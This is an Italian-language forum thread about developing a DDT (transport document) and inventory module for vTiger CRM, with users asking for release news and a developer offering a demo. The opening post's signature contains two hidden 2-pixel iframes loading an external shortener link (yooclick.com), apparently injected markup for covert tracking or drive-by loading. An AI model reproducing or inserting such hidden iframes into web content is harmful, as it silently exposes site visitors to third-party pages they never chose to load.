Sviluppo modulo DDT per vTiger

edited December 2010 in Vote Up0Vote Down
Stiamo sviluppando, in collaborazione col team di vTiger.it,
il modulo per la gestione dei DDT.

Chiunque fosse interessato e' pregato di contattare il team di vTiger.it
o il sottoscritto.

Breve descrizione del modulo:

- possibilita' di creare DDT di entrata/carico e uscita/scarico merci

- gestione delle giacenze:
per ogni prodotto e' possibile inserire una q.ta' di 'inventario'
sulla quale, conseguentemente ai vari DDT emessi, viene effettuato
il calcolo della giacenza


Saluti
L.eandro (infoatalpha-centauridotbiz) <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;
«1

Comments

  • 19 Comments sorted by Votes Date Added
  • salve,

    vorrei sapere se lo sviluppo del modulo ddt procede, e se è stata prevista una data di rilascio.

    sto spingendo per la sua adozione nell'azienda in cui sono impiegato, ma la capacità di gestire i documenti di trasporto è un requisito fondamentale ed irrinunciabile, e finché non sarà disponibile, difficilmente potrò essere ascoltato.

    saluti a tutti,

    (nell'eventualità dovesse tornare utile un programmatore per aiutarvi a sviluppare questo modulo, mi metto a disposizione. sono digiuno di php, ma con un po di buona volontà posso provarci )
  • stiamo sviluppando, in collaborazione col team di vtiger.it,
    il modulo per la gestione dei ddt.

    chiunque fosse interessato e' pregato di contattare il team di vtiger.it
    o il sottoscritto.

    breve descrizione del modulo:

    - possibilita' di creare ddt di entrata/carico e uscita/scarico merci

    - gestione delle giacenze:
    per ogni prodotto e' possibile inserire una q.ta' di 'inventario'
    sulla quale, conseguentemente ai vari ddt emessi, viene effettuato
    il calcolo della giacenza


    saluti
    l.eandro (infoatalpha-centauridotbiz)

    ciao,
    forse arrivo tardi... sono anche io interessato al modulo ddt per vtiger, chiedo quindi qua sul forum se c'è qualche novità in merito a questa implementazione, eventualmente anche se ci fosse qualcosa di abbozzato potrei proseguire io a lavorarci su, e poi metterlo a disposizione.

    avevo anche letto in un precedente post la possibilità di "adattare" il modulo fattura accompagnatoria, il che mi sembra percorribile.

    se qualcuno ha aggiornamenti in merito fatemi sapere. sono a disposizione anche per scrivere un po' di codice.

    ciao,
    luca bartolini
  • ciao a tutti
    un nostro cliente ha finalmente commissionato il modulo ddt, conto entro 1 mese di poterlo rilasciare.

    salve davide
  • salve a tutti,
    sono nuovo del forum, ci sono novità sul modulo ddt ??
    grazie 1000
    davide
  • ciao,
    anche per me sarebbe fondamentale avere i ddt.
    news in merito?

    grazie a tutti.
    luca
  • si è pronto
    il modulo ddt viene generato da un ordine, quindi prima genero l'ordine poi il ddt.
    andrebbe bene cosi?
  • direi che sarebbe meraviglioso.
    se proprio volessimo una mercedes allora sarebbe fortissimo avere la possibilità, in un secondo momento, di avere la possibilità di visualizzare i ddt ancora da fatturare e, a fine mese, avere un comando "fattura ddt ancora aperti" in cui si generi in automatico la fattura per cliente (intendo che se ad un cliente faccio 10 ddt non mi deve fare 10 fatture ma una cumulativa).

    che dici chiedo troppo?

    2- come posso aggiornare il mio vtiger con il tuo modulo ddt?
    ciao e molte grazie,
    luca
  • si dovrebbe esserci, adesso pero ci troviamo di fronte ad un problema, rilasciarvi la versione per 504 o fare un salto direttamente alla 5.1

    che facciamo?
  • ma guarda, io parlo per me: la 5.10 doveva uscire a dicembre ed è stata continuamente rinviata (almeno da quanto leggo) ma ormai creso che non manchi molto.
    io fare quella,.

    ciao,
    luca
  • si prima genero l'ordine e poi si prende azienda prodotti ecc dall'ordine per generare il ddt.
    se per voi va bene faccio una demo online e poi mi dite se puo andare. io sono disponibile lunedi prossimo dalle 17 alle 18. se è ok procedo con lo scoporo del codice e invio. mettemi le email sul forum che vi mando il link di collegamento per la demo.

    ciao davide
Sign In or Register to comment.